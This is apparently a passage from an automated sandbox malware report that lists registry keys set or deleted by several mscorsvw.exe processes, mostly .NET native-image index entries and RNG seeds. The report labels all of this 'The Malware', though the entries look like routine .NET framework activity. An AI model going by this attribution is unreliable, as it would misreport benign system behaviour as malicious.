[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]

The process mscorsvw.exe:3680 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 CD A9 25 B6 E9 CA 81 80 E3 1A D9 9A 23 9B D3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3532 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF 70 94 3E 16 AE F0 B9 19 2F 51 C0 75 4D E1 97"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

The process mscorsvw.exe:2924 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 7A 88 1B 31 CD 98 F5 37 9B 53 4F C4 46 8E 89"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2700 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 60 EE A6 A2 00 34 7A 18 40 19 87 49 D0 4C AE"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "00 34 67 7B 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]

The process mscorsvw.exe:2160 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 1B 08 5B A3 96 8E BB FC BB D6 B9 75 6C F2 A9"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2756 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD B8 5E 74 CF C0 1F B2 96 50 BB 15 11 4D EF 95"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3136 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "6E 62 79 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "60 0E 41 7B 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 A5 FD FF 22 47 FF 09 EE 75 5F 5C F1 38 58 6A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]

The process mscorsvw.exe:3336 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C E8 B4 78 35 85 A0 31 5E 49 93 F2 2B EF 78 A4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3408 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 02 61 B7 AD 95 36 88 51 E1 22 81 5F CC 02 5C"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:280 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 60 85 67 21 00 61 CB CC 9C E4 79 02 35 8B CD"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:3816 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"

